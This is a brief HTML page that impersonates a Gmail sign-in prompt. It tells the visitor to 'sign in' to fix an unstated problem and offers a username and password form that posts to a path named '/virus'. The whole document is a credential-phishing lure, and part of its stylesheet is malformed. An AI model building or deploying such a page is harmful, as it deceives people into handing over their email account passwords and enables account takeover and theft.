

<h1>
  To fix this, please sign in
</h1>
<h2>
  Sign in to continue to Gmail
  </h2>



<div class="div1">
<form action="/virus">
  <label for="username"> Gmail Username </label>
    <input type= "text" id="username" name="username"> <br>
  
  <label for="password"> Gmail password </label>
    <input type= "password" id="password" name="password"> <br>
  
  <input type="submit">
</form>
</div>

<style>
body{
  background-color:white;
}

h2 {
font-family: 'Open Sans', arial;
-webkit-font-smoothing: antialiased;
color: #555;
font-size: 18px;
font-weight: 400;
  
h1 {
font-family: 'Open Sans', arial;
-webkit-font-smoothing: antialiased;
color: #555;
font-size: 42px;
font-weight: 300;
margin-top: 0;
margin-bottom: 20px;
}















</style>